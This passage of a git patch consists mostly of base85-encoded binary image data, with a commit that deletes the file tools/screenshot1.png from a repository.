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 b3!=~5#*be4t)uS=^u5VRixVZsU9bK>bf;VI literal 0 HcmV?d00001 From 0814074149f26ca8365c72e1956ee2c87ed18959 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 8 May 2019 01:07:20 +0100 Subject: [PATCH 103/214] Delete screenshot1.png --- tools/screenshot1.png | Bin 65923 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 tools/screenshot1.png diff --git a/tools/screenshot1.png b/tools/screenshot1.png deleted file mode 100644 index 09bf7aa969d437421d40a5641342f641b38a6c21..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 65923 zcmXt20g;LxC1S{?ZiaQi{iWUe?ptuz$KyY`LH~$as zo!PmQJ3BWY?%8Lb^E+pwKB+6?U{YcN00117_X=770E!*}fCNBCg+G~)mh6S!klo*@ z=%B+d5W00F{5OS%qJf9Dv#p1>g_{lFi<7gX4Y#|Mn~jZ=yPdPgDN>g-d=mG6ljPlO 